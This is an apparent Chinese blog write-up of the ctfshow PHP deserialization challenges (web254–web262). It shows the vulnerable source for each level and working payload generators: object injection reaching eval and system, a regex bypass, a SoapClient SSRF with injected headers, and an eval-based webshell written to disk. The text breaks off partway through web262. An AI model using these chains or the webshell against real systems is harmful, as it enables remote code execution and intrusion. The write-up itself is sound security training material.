{"id":227,"date":"2021-07-14T19:48:29","date_gmt":"2021-07-14T11:48:29","guid":{"rendered":"http:\/\/101.34.19.194\/?p=227"},"modified":"2021-07-14T19:55:29","modified_gmt":"2021-07-14T11:55:29","slug":"ctfshow-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=227","title":{"rendered":"ctfshow-\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"\n<p>\u77e5\u8bc6\u70b9\uff1a<a href=\"http:\/\/101.34.19.194\/?p=230\">php\u53cd\u5e8f\u5217\u5316 \u2013 \u9752\u5d50<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web254<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username===$u&amp;&amp;$this-&gt;password===$p){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;isVip=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = new ctfShowUser();<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0c\u9996\u5148\u521d\u59cb\u5316ctfShowUser\u7c7b\uff0c\u5728\u7b2c\u4e8c\u5c42if\u5f53\u4e2d\u9996\u5148\u6267\u884clogin\u65b9\u6cd5\uff0c\u7528\u4e8e\u5224\u65ad\u6211\u4eecget\u4f20\u5165\u7684\u53c2\u6570username\u548cpassword\u662f\u5426\u4e0e\u7c7b\u4e2d\u4e00\u81f4\uff0c\u53d1\u73b0\u7528\u6237\u540d\u548c\u5bc6\u7801\u90fd\u662fxxxxxx\uff0c\u56e0\u6b64\u6211\u4eec\u53ea\u9700\u8981\u4f20\u5165username=xxxxxx&amp;password=xxxxxx\u5373\u53ef\u83b7\u53d6flag<\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web255<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']); &nbsp; &nbsp;<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0cif\u7b2c\u4e00\u5c42\u5224\u65ad\u662f\u5426\u4f20\u5165username\u548cpassword\u503c\uff0c\u4e14\u7c7b\u4e2d\u7684checkVip\u9700\u8981$this-&gt;isVip\u662ftrue\uff0c\u4e4b\u540e\u6267\u884cvipOneKeyGetFlag\u83b7\u53d6flag\u3002\u56e0\u6b64\u5728\u53cd\u5e8f\u5217\u5316\u65f6\u9700\u8981\u4fee\u6539false\u4e3atrue<\/p><p>\u5176\u6b21if\u7b2c\u4e8c\u5c42\u5224\u65ad\u4e2dlogin\u65b9\u6cd5\u5224\u65adusername\u548cpassword\u90fd\u4e3a\u6240\u58f0\u660e\u7684xxxxxx<\/p><\/blockquote>\n\n\n\n<p>\u636e\u6b64\u5199\u51fa\u53cd\u5e8f\u5217\u5316\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=true;<br>}<br>\u200b<br>echo urlencode(serialize(new ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3acookie\u5b57\u6bb5\u4e2d\u7684\u503c\u9700\u8981url\u7f16\u7801\uff0c\u6240\u4ee5\u5229\u7528urlencode\u8fdb\u884c\u7f16\u7801\uff0c\u5f97\u5230\u7ed3\u679c\u8fdb\u884c\u4fee\u6539cookie\uff0ccookie\u4e2d\u7684\u5b57\u6bb5\u540d\u4e3auser\uff0c\u5b57\u6bb5\u503c\u4e3a\u8fd0\u884cphp\u811a\u672c\u540e\u7684\u503c<\/p>\n\n\n\n<p>\u6700\u540e\u8fdb\u884cget\u4f20\u53c2\uff1a<code>username=xxxxxx&amp;password=xxxxxx<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web256<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username!==$this-&gt;password){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']); &nbsp; &nbsp;<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5927\u81f4\u548c\u4e0a\u4e00\u9898\u76f8\u540c\uff0c\u591a\u4e86\u4e00\u4e2a\u5224\u65ad<\/p><p>if($this-&gt;username!==$this-&gt;password)<\/p><p>\u4e5f\u5c31\u662fusername\u548cpassword\u7684\u503c\u4e0d\u80fd\u76f8\u540c<\/p><p>\u90a3\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u5bf9\u8fd9\u4e24\u4e2a\u53d8\u91cf\u8fdb\u884c\u4fee\u6539<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='a';<br> &nbsp; &nbsp;public $password='b';<br> &nbsp; &nbsp;public $isVip=true;<br>}<br>echo urlencode(serialize(new ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u6700\u540eget\u5bf9username\u548cpassword\u4f20\u53c2\u9700\u8981\u4e0e\u53cd\u5e8f\u5217\u5316\u6240\u8bbe\u7f6e\u7684\u503c\u76f8\u540c<\/p>\n\n\n\n<p>payload\uff1a<code>?username=a&amp;password=b<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web257<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;private $username='xxxxxx';<br> &nbsp; &nbsp;private $password='xxxxxx';<br> &nbsp; &nbsp;private $isVip=false;<br> &nbsp; &nbsp;private $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp; &nbsp;private $user='xxxxxx';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp; &nbsp;private $code;<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']);<br> &nbsp; &nbsp;$user-&gt;login($username,$password);<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><code>__construct<\/code>\u5f53\u5bf9\u8c61\u88ab\u521b\u5efa\u7684\u65f6\u5019\u81ea\u52a8\u8c03\u7528\uff0c\u5bf9\u5bf9\u8c61\u8fdb\u884c\u521d\u59cb\u5316\u3002\u5f53\u6240\u6709\u7684\u64cd\u4f5c\u6267\u884c\u5b8c\u6bd5\u4e4b\u540e\uff0c\u9700\u8981\u91ca\u653e\u5e8f\u5217\u5316\u7684\u5bf9\u8c61\uff0c\u89e6\u53d1<code>__destruct()<\/code>\u9b54\u672f\u65b9\u6cd5<\/p><p>\u4ee3\u7801\u4e2d\u53ef\u4ee5\u770b\u5230\u6709\u5728bakckDoor\u7c7b\u4e2d\u6709eval\u51fd\u6570\uff0c\u53ef\u4ee5\u5229\u7528eval\u51fd\u6570\u6267\u884c\u547d\u4ee4<\/p><\/blockquote>\n\n\n\n<p>\u56e0\u6b64\u6211\u4eec\u53ea\u9700\u8981\u5728\u6267\u884c<code>__construct<\/code>\u7684\u65f6\u5019\u521d\u59cb\u5316backDoor\u7c7b\uff0c\u65b9\u4fbf\u6211\u4eec\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u7684\u5229\u7528\uff0c\u4e4b\u540e\u53cd\u5e8f\u5217\u5316\u7ed3\u675f\u540e\uff0c\u4f1a\u6267\u884c<code>__destruct()<\/code>,\u6b64\u65f6<code>eval($this-&gt;code);<\/code>\u7b49\u4ef7\u4e8e<code>eval(system('tac flag.php');)<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;private $username='xxxxxx';<br> &nbsp; &nbsp;private $password='xxxxxx';<br> &nbsp; &nbsp;private $isVip=false;<br> &nbsp; &nbsp;private $class = 'backDoor';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new backDoor();<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>}<br>class backDoor{<br> &nbsp; &nbsp;private $code='system(\"tac flag.php\");';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>echo urlencode(serialize(new ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u901a\u8fc7get\u4f20\u53c2username\u548cpassword\u5373\u53ef<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web258\u2014\u6b63\u5219\u5339\u914d\u7ed5\u8fc7<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br> &nbsp; &nbsp;public $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp; &nbsp;public $user='xxxxxx';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp; &nbsp;public $code;<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;if(!preg_match('\/&#91;oc]:\\d+:\/i', $_COOKIE&#91;'user'])){<br> &nbsp; &nbsp; &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']);<br> &nbsp;  }<br> &nbsp; &nbsp;$user-&gt;login($username,$password);<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0c\u9700\u8981\u7ed5\u8fc7preg_match(\u2019\/[oc]:\\d+:\/i\u2019, $var),\u4f7f\u7528\u2795<\/p><\/blockquote>\n\n\n\n<p>\u4e0d\u8fdb\u884c\u7ed5\u8fc7\u65f6\uff0c\u5e8f\u5217\u5316\u540e\u8f93\u51fa\u7684\u662f<\/p>\n\n\n\n<p><code>O:11:\"ctfShowUser\":4:{s:8:\"username\";s:6:\"xxxxxx\";s:8:\"password\";s:6:\"xxxxxx\";s:5:\"isVip\";b:0;s:5:\"class\";O:8:\"backDoor\":1:{s:4:\"code\";s:23:\"system(\"tac flag.php\");\";}}<\/code><\/p>\n\n\n\n<p>\u7531\u4e8e\u6b63\u5219\u5339\u914d\u4f1a\u5339\u914d\u5f97\u5230\uff0c\u6240\u4ee5\u9700\u8981\u5c06<code>O:11<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff0c\u66ff\u6362\u6210<code>O:+11<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br> &nbsp; &nbsp;public $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new backDoor();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>class backDoor{<br> &nbsp; &nbsp;public $code = 'system(\"tac flag.php\");';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>$a = serialize(new ctfShowUser());<br>$b = urlencode(str_replace('O:','O:+',$a));<br>echo $b;<\/code><\/pre>\n\n\n\n<p>\u5269\u4e0b\u7684\u505a\u6cd5\u548c\u4e0a\u9898\u4e00\u6837<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web259\u2014SoapClient<\/h2>\n\n\n\n<p>flag.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$xff = explode(',', $_SERVER&#91;'HTTP_X_FORWARDED_FOR']);<br>array_pop($xff);<br>$ip = array_pop($xff);<br>\u200b<br>\u200b<br>if($ip!=='127.0.0.1'){<br>    die('error');<br>}else{<br>    $token = $_POST&#91;'token'];<br>    if($token=='ctfshow'){<br>        file_put_contents('flag.txt',$flag);<br>    }<br>}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e2a\u9898\u5229\u7528\u7684\u662fphp\u539f\u751f\u7c7bSoapClient<\/p>\n\n\n\n<p>\u8be5\u7c7b\u7684\u6784\u9020\u51fd\u6570\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public SoapClient :: SoapClient \uff08mixed $wsdl [\uff0carray $options ]\uff09<\/pre>\n\n\n\n<p>\u5e94\u8be5\u8fd8\u6709\u4e00\u6761\u5224\u65ad\u771f\u5b9eip\u7684\u4e5f\u5c31\u662f<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){<br>xxxxxx;<br>}<\/pre>\n\n\n\n<p>\u6240\u4ee5\u9996\u5148\u5f97\u5229\u7528ssrf\u8bbf\u95eeflag.php\u63a5\u7740\u6784\u9020post\u6570\u636e toke=ctfshow\u548c\u8bf7\u6c42\u5934X-Forwarded-For \u5c31\u80fd\u628aflag\u5199\u5230flag.txt\u4e2d\u4e86\u3002<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$ua = \"ctfshow\\r\\nX-Forwarded-For:127.0.0.1,127.0.0.1,127.0.0.1\\r\\nContent-Type:application\/x-www-form-urlencoded\\r\\nContent-Length:13\\r\\n\\r\\ntoken=ctfshow\";<br>\u200b<br>$client = new SoapClient(null,array('uri' =&gt; 'http:\/\/127,0.0.1\/','location' =&gt; 'http:\/\/127.0.0.1\/flag.php','user_agent' =&gt; $ua));<br>\u200b<br>echo urlencode(serialize($client));<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web260<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>if(preg_match('\/ctfshow_i_love_36D\/',serialize($_GET&#91;'ctfshow']))){<br> &nbsp; &nbsp;echo $flag;<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5c31\u53ea\u6709\u6b63\u5219\u5339\u914d\u5f97\u5230ctfshow_i_love_36D\u5c31\u53ef\u4ee5\u8f93\u51faflag\u4e86<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshow{<br>    public $ctfshow=ctfshow_i_love_36D; <br>}<br>echo serialize(new ctfshow());<\/code><\/pre>\n\n\n\n<p>\u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u503c\u901a\u8fc7get\u65b9\u5f0f\u4f20\u53c2\u7ed9ctfshow<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web261<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>class ctfshowvip{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br> &nbsp; &nbsp;public $code;<br>\u200b<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __wakeup(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username!='' || $this-&gt;password!=''){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;die('error');<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public function __invoke(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>\u200b<br> &nbsp; &nbsp;public function __sleep(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username='';<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password='';<br> &nbsp;  }<br> &nbsp; &nbsp;public function __unserialize($data){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$data&#91;'username'];<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$data&#91;'password'];<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;code = $this-&gt;username.$this-&gt;password;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;code==0x36d){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;file_put_contents($this-&gt;username, $this-&gt;password);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>unserialize($_GET&#91;'vip']);<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5982\u679c\u7c7b\u4e2d\u540c\u65f6\u5b9a\u4e49\u4e86 <strong>unserialize() \u548c <\/strong>wakeup() \u4e24\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c \u5219\u53ea\u6709 <strong>unserialize() \u65b9\u6cd5\u4f1a\u751f\u6548\uff0c<\/strong>wakeup() \u65b9\u6cd5\u4f1a\u88ab\u5ffd\u7565\u3002<\/p><\/blockquote>\n\n\n\n<p>\u5f53\u53cd\u5e8f\u5217\u5316\u65f6\u4f1a\u8fdb\u5165<strong>unserialize\u4e2d\uff0c\u800c\u4e14\u4e5f\u6ca1\u6709\u4ec0\u4e48\u65b9\u6cd5\u53ef\u4ee5\u8fdb\u5165\u5230<\/strong>invoke\u4e2d\u3002\u6240\u4ee5\u76f4\u63a5\u5c31\u671d\u7740\u5199\u6587\u4ef6\u641e\u5c31\u53ef\u4ee5\u4e86\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ea\u8981\u6ee1\u8db3code==0x36d(877)\u5c31\u53ef\u4ee5\u4e86\u3002 \u800ccode\u662fusername\u548cpassword\u62fc\u63a5\u51fa\u6765\u7684\u3002 \u6240\u4ee5\u53ea\u8981username=877.php password=shell\u5c31\u53ef\u4ee5\u4e86\u3002 877.php==877\u662f\u6210\u7acb\u7684\uff08\u5f31\u7c7b\u578b\u6bd4\u8f83\uff09<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshowvip{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br>}<br>$a=new ctfshowvip('877.php','&lt;?php eval($_POST&#91;1]);?&gt;');<br>echo serialize($a);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web262\u2014\u5b57\u7b26\u9003\u9038<\/h2>\n\n\n\n<p>\u9996\u9875\u6e90\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\/*<br># -*- coding: utf-8 -*-<br># @Author: h1xa<br># @Date: &nbsp; 2020-12-03 02:37:19<br># @Last Modified by: &nbsp; h1xa<br># @Last Modified time: 2020-12-03 16:05:38<br># @message.php<br># @email: h1xa@ctfer.com<br># @link: https:\/\/ctfer.com<br>*\/<br>error_reporting(0);<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>$f = $_GET&#91;'f'];<br>$m = $_GET&#91;'m'];<br>$t = $_GET&#91;'t'];<br>\u200b<br>if(isset($f) &amp;&amp; isset($m) &amp;&amp; isset($t)){<br> &nbsp; &nbsp;$msg = new message($f,$m,$t);<br> &nbsp; &nbsp;$umsg = str_replace('fuck', 'loveU', serialize($msg));<br> &nbsp; &nbsp;setcookie('msg',base64_encode($umsg));<br> &nbsp; &nbsp;echo 'Your message has been sent';<br>}<br>\u200b<br>highlight_file(__FILE__);<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ef\u4ee5\u770b\u5230\u6709\u5b57\u7b26\u66ff\u6362\uff0c<code>fuck<\/code>\u66ff\u6362\u6210<code>loveU<\/code>\uff0c\u5c5e\u4e8e\u5b57\u7b26\u53d8\u591a\uff0c\u6bcf\u6b21\u53d8\u591a\u4e00\u4e2a\u5b57\u7b26<\/p><p>\u5e8f\u5217\u5316\u540ebase64\u52a0\u5bc6\u8bbe\u7f6e\u6210cookie<\/p><p>\u63d0\u793a\u91cc\u6709message.php<\/p><\/blockquote>\n\n\n\n<p>message.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;msg = $m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>if(isset($_COOKIE&#91;'msg'])){<br> &nbsp; &nbsp;$msg = unserialize(base64_decode($_COOKIE&#91;'msg']));<br> &nbsp; 